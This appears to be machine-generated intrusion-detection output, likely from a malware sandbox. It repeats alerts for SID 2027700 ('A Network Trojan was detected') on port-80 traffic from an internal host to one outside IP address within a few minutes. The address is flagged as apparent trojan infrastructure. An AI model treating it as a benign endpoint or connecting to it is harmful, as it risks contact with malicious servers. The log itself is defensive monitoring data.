                              Timestamp:192.168.2.762.204.41.450032802027700 02/07/23-23:08:32.408441
                              SID:2027700
                              Source Port:50032
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450384802027700 02/07/23-23:10:05.420068
                              SID:2027700
                              Source Port:50384
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449722802027700 02/07/23-23:07:08.360519
                              SID:2027700
                              Source Port:49722
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449878802027700 02/07/23-23:07:49.349230
                              SID:2027700
                              Source Port:49878
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450127802027700 02/07/23-23:08:58.089434
                              SID:2027700
                              Source Port:50127
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449750802027700 02/07/23-23:07:14.882617
                              SID:2027700
                              Source Port:49750
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449704802027700 02/07/23-23:07:03.968547
                              SID:2027700
                              Source Port:49704
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450050802027700 02/07/23-23:08:38.652718
                              SID:2027700
                              Source Port:50050
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449737802027700 02/07/23-23:07:12.033255
                              SID:2027700
                              Source Port:49737
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450004802027700 02/07/23-23:08:25.569822
                              SID:2027700
                              Source Port:50004
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450341802027700 02/07/23-23:09:54.975800
                              SID:2027700
                              Source Port:50341
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450356802027700 02/07/23-23:09:58.629045
                              SID:2027700
                              Source Port:50356
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449994802027700 02/07/23-23:08:23.133003
                              SID:2027700
                              Source Port:49994
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450145802027700 02/07/23-23:09:02.533585
                              SID:2027700
                              Source Port:50145
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449793802027700 02/07/23-23:07:27.063291
                              SID:2027700
                              Source Port:49793
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449933802027700 02/07/23-23:08:05.759793
                              SID:2027700
                              Source Port:49933
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450418802027700 02/07/23-23:10:13.656697
                              SID:2027700
                              Source Port:50418
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449755802027700 02/07/23-23:07:16.092892
                              SID:2027700
                              Source Port:49755
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450469802027700 02/07/23-23:10:28.062597
                              SID:2027700
                              Source Port:50469
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450155802027700 02/07/23-23:09:04.977918
                              SID:2027700
                              Source Port:50155
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449951802027700 02/07/23-23:08:10.180584
                              SID:2027700
                              Source Port:49951
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450060802027700 02/07/23-23:08:41.073047
                              SID:2027700
                              Source Port:50060
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449827802027700 02/07/23-23:07:35.253285
                              SID:2027700
                              Source Port:49827
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450351802027700 02/07/23-23:09:57.406628
                              SID:2027700
                              Source Port:50351
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449732802027700 02/07/23-23:07:10.829866
                              SID:2027700
                              Source Port:49732
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450328802027700 02/07/23-23:09:51.766213
                              SID:2027700
                              Source Port:50328
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450178802027700 02/07/23-23:09:12.666182
                              SID:2027700
                              Source Port:50178
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450374802027700 02/07/23-23:10:02.999700
                              SID:2027700
                              Source Port:50374
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449810802027700 02/07/23-23:07:31.110999
                              SID:2027700
                              Source Port:49810
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450173802027700 02/07/23-23:09:11.479350
                              SID:2027700
                              Source Port:50173
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449905802027700 02/07/23-23:07:57.664790
                              SID:2027700
                              Source Port:49905
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450268802027700 02/07/23-23:09:36.981445
                              SID:2027700
                              Source Port:50268
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449727802027700 02/07/23-23:07:09.536306
                              SID:2027700
                              Source Port:49727
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449709802027700 02/07/23-23:07:05.205403
                              SID:2027700
                              Source Port:49709
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450251802027700 02/07/23-23:09:32.760947
                              SID:2027700
                              Source Port:50251
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450446802027700 02/07/23-23:10:22.408033
                              SID:2027700
                              Source Port:50446
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450318802027700 02/07/23-23:09:49.262876
                              SID:2027700
                              Source Port:50318
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450346802027700 02/07/23-23:09:56.168424
                              SID:2027700
                              Source Port:50346
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449956802027700 02/07/23-23:08:11.390677
                              SID:2027700
                              Source Port:49956
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449800802027700 02/07/23-23:07:28.753249
                              SID:2027700
                              Source Port:49800
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450122802027700 02/07/23-23:08:56.823302
                              SID:2027700
                              Source Port:50122
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450278802027700 02/07/23-23:09:39.423463
                              SID:2027700
                              Source Port:50278
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450022802027700 02/07/23-23:08:30.007207
                              SID:2027700
                              Source Port:50022
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450313802027700 02/07/23-23:09:48.033865
                              SID:2027700
                              Source Port:50313
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450200802027700 02/07/23-23:09:18.098931
                              SID:2027700
                              Source Port:50200
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449760802027700 02/07/23-23:07:17.283372
                              SID:2027700
                              Source Port:49760
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449765802027700 02/07/23-23:07:19.352231
                              SID:2027700
                              Source Port:49765
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449902802027700 02/07/23-23:07:55.670942
                              SID:2027700
                              Source Port:49902
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449984802027700 02/07/23-23:08:20.651522
                              SID:2027700
                              Source Port:49984
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450176802027700 02/07/23-23:09:12.185200
                              SID:2027700
                              Source Port:50176
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449701802027700 02/07/23-23:07:03.267557
                              SID:2027700
                              Source Port:49701
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450415802027700 02/07/23-23:10:12.934992
                              SID:2027700
                              Source Port:50415
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450476802027700 02/07/23-23:10:29.753559
                              SID:2027700
                              Source Port:50476
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450320802027700 02/07/23-23:09:49.746312
                              SID:2027700
                              Source Port:50320
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449786802027700 02/07/23-23:07:25.415635
                              SID:2027700
                              Source Port:49786
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450448802027700 02/07/23-23:10:22.892315
                              SID:2027700
                              Source Port:50448
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450053802027700 02/07/23-23:08:39.384369
                              SID:2027700
                              Source Port:50053
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449829802027700 02/07/23-23:07:35.738938
                              SID:2027700
                              Source Port:49829
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450219802027700 02/07/23-23:09:22.722186
                              SID:2027700
                              Source Port:50219
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450071802027700 02/07/23-23:08:43.808188
                              SID:2027700
                              Source Port:50071
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449930802027700 02/07/23-23:08:05.022671
                              SID:2027700
                              Source Port:49930
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450148802027700 02/07/23-23:09:03.260796
                              SID:2027700
                              Source Port:50148
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450025802027700 02/07/23-23:08:30.727717
                              SID:2027700
                              Source Port:50025
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450221802027700 02/07/23-23:09:23.231201
                              SID:2027700
                              Source Port:50221
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449885802027700 02/07/23-23:07:51.097832
                              SID:2027700
                              Source Port:49885
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450043802027700 02/07/23-23:08:36.948526
                              SID:2027700
                              Source Port:50043
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449857802027700 02/07/23-23:07:44.177016
                              SID:2027700
                              Source Port:49857
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449987802027700 02/07/23-23:08:21.404063
                              SID:2027700
                              Source Port:49987
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450453802027700 02/07/23-23:10:24.103441
                              SID:2027700
                              Source Port:50453
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450101802027700 02/07/23-23:08:51.475051
                              SID:2027700
                              Source Port:50101
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449831802027700 02/07/23-23:07:36.211398
                              SID:2027700
                              Source Port:49831
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449834802027700 02/07/23-23:07:37.138339
                              SID:2027700
                              Source Port:49834
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450450802027700 02/07/23-23:10:23.361477
                              SID:2027700
                              Source Port:50450
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450015802027700 02/07/23-23:08:28.258645
                              SID:2027700
                              Source Port:50015
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449923802027700 02/07/23-23:08:03.274770
                              SID:2027700
                              Source Port:49923
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450272802027700 02/07/23-23:09:37.970566
                              SID:2027700
                              Source Port:50272
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450349802027700 02/07/23-23:09:56.920228
                              SID:2027700
                              Source Port:50349
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450183802027700 02/07/23-23:09:13.886211
                              SID:2027700
                              Source Port:50183
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449803802027700 02/07/23-23:07:29.455829
                              SID:2027700
                              Source Port:49803
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450275802027700 02/07/23-23:09:38.709285
                              SID:2027700
                              Source Port:50275
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449758802027700 02/07/23-23:07:16.813665
                              SID:2027700
                              Source Port:49758
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450377802027700 02/07/23-23:10:03.701999
                              SID:2027700
                              Source Port:50377
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449977802027700 02/07/23-23:08:18.914835
                              SID:2027700
                              Source Port:49977
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450028802027700 02/07/23-23:08:31.449239
                              SID:2027700
                              Source Port:50028
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450117802027700 02/07/23-23:08:55.559827
                              SID:2027700
                              Source Port:50117
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450247802027700 02/07/23-23:09:31.810490
                              SID:2027700
                              Source Port:50247
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450425802027700 02/07/23-23:10:15.374875
                              SID:2027700
                              Source Port:50425
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449806802027700 02/07/23-23:07:30.176072
                              SID:2027700
                              Source Port:49806
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449888802027700 02/07/23-23:07:51.818185
                              SID:2027700
                              Source Port:49888
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449694802027700 02/07/23-23:07:00.567051
                              SID:2027700
                              Source Port:49694
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449949802027700 02/07/23-23:08:09.663718
                              SID:2027700
                              Source Port:49949
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450081802027700 02/07/23-23:08:46.318733
                              SID:2027700
                              Source Port:50081
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449783802027700 02/07/23-23:07:24.676198
                              SID:2027700
                              Source Port:49783
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450199802027700 02/07/23-23:09:17.854664
                              SID:2027700
                              Source Port:50199
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450314802027700 02/07/23-23:09:48.299454
                              SID:2027700
                              Source Port:50314
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449924802027700 02/07/23-23:08:03.524088
                              SID:2027700
                              Source Port:49924
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450252802027700 02/07/23-23:09:32.997462
                              SID:2027700
                              Source Port:50252
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450350802027700 02/07/23-23:09:57.159011
                              SID:2027700
                              Source Port:50350
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449789802027700 02/07/23-23:07:26.125135
                              SID:2027700
                              Source Port:49789
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449887802027700 02/07/23-23:07:51.576053
                              SID:2027700
                              Source Port:49887
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450347802027700 02/07/23-23:09:56.442076
                              SID:2027700
                              Source Port:50347
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450445802027700 02/07/23-23:10:22.165070
                              SID:2027700
                              Source Port:50445
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449980802027700 02/07/23-23:08:19.678959
                              SID:2027700
                              Source Port:49980
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450409802027700 02/07/23-23:10:11.502083
                              SID:2027700
                              Source Port:50409
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450089802027700 02/07/23-23:08:48.291498
                              SID:2027700
                              Source Port:50089
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450244802027700 02/07/23-23:09:31.095485
                              SID:2027700
                              Source Port:50244
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449957802027700 02/07/23-23:08:11.632559
                              SID:2027700
                              Source Port:49957
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449703802027700 02/07/23-23:07:03.736813
                              SID:2027700
                              Source Port:49703
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450031802027700 02/07/23-23:08:32.148800
                              SID:2027700
                              Source Port:50031
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449862802027700 02/07/23-23:07:45.411368
                              SID:2027700
                              Source Port:49862
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450440802027700 02/07/23-23:10:20.951914
                              SID:2027700
                              Source Port:50440
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449792802027700 02/07/23-23:07:26.828357
                              SID:2027700
                              Source Port:49792
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450179802027700 02/07/23-23:09:12.913891
                              SID:2027700
                              Source Port:50179
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450084802027700 02/07/23-23:08:47.056885
                              SID:2027700
                              Source Port:50084
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450126802027700 02/07/23-23:08:57.855567
                              SID:2027700
                              Source Port:50126
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449756802027700 02/07/23-23:07:16.330637
                              SID:2027700
                              Source Port:49756
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449993802027700 02/07/23-23:08:22.893784
                              SID:2027700
                              Source Port:49993
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450159802027700 02/07/23-23:09:05.933299
                              SID:2027700
                              Source Port:50159
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450076802027700 02/07/23-23:08:45.054389
                              SID:2027700
                              Source Port:50076
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450257802027700 02/07/23-23:09:34.266479
                              SID:2027700
                              Source Port:50257
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450232802027700 02/07/23-23:09:25.965511
                              SID:2027700
                              Source Port:50232
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450113802027700 02/07/23-23:08:54.584710
                              SID:2027700
                              Source Port:50113
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450367802027700 02/07/23-23:10:01.324979
                              SID:2027700
                              Source Port:50367
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450465802027700 02/07/23-23:10:27.020474
                              SID:2027700
                              Source Port:50465
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450195802027700 02/07/23-23:09:16.860331
                              SID:2027700
                              Source Port:50195
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449867802027700 02/07/23-23:07:46.640725
                              SID:2027700
                              Source Port:49867
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449818802027700 02/07/23-23:07:33.042482
                              SID:2027700
                              Source Port:49818
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450330802027700 02/07/23-23:09:52.266544
                              SID:2027700
                              Source Port:50330
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449960802027700 02/07/23-23:08:12.428217
                              SID:2027700
                              Source Port:49960
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450146802027700 02/07/23-23:09:02.779773
                              SID:2027700
                              Source Port:50146
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450359802027700 02/07/23-23:09:59.354061
                              SID:2027700
                              Source Port:50359
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449776802027700 02/07/23-23:07:23.001075
                              SID:2027700
                              Source Port:49776
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450011802027700 02/07/23-23:08:27.300770
                              SID:2027700
                              Source Port:50011
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450432802027700 02/07/23-23:10:18.991989
                              SID:2027700
                              Source Port:50432
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449854802027700 02/07/23-23:07:43.442984
                              SID:2027700
                              Source Port:49854
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450182802027700 02/07/23-23:09:13.649408
                              SID:2027700
                              Source Port:50182
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450478802027700 02/07/23-23:10:30.234168
                              SID:2027700
                              Source Port:50478
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449937802027700 02/07/23-23:08:06.728827
                              SID:2027700
                              Source Port:49937
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450265802027700 02/07/23-23:09:36.236425
                              SID:2027700
                              Source Port:50265
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449805802027700 02/07/23-23:07:29.940054
                              SID:2027700
                              Source Port:49805
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449716802027700 02/07/23-23:07:06.915416
                              SID:2027700
                              Source Port:49716
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450096802027700 02/07/23-23:08:49.987228
                              SID:2027700
                              Source Port:50096
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450390802027700 02/07/23-23:10:06.856141
                              SID:2027700
                              Source Port:50390
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450166802027700 02/07/23-23:09:08.121536
                              SID:2027700
                              Source Port:50166
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449743802027700 02/07/23-23:07:13.457751
                              SID:2027700
                              Source Port:49743
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450264802027700 02/07/23-23:09:35.995836
                              SID:2027700
                              Source Port:50264
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450433802027700 02/07/23-23:10:19.240532
                              SID:2027700
                              Source Port:50433
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450080802027700 02/07/23-23:08:46.056281
                              SID:2027700
                              Source Port:50080
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450077802027700 02/07/23-23:08:45.296740
                              SID:2027700
                              Source Port:50077
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450007802027700 02/07/23-23:08:26.308602
                              SID:2027700
                              Source Port:50007
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449874802027700 02/07/23-23:07:48.380254
                              SID:2027700
                              Source Port:49874
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450334802027700 02/07/23-23:09:53.217371
                              SID:2027700
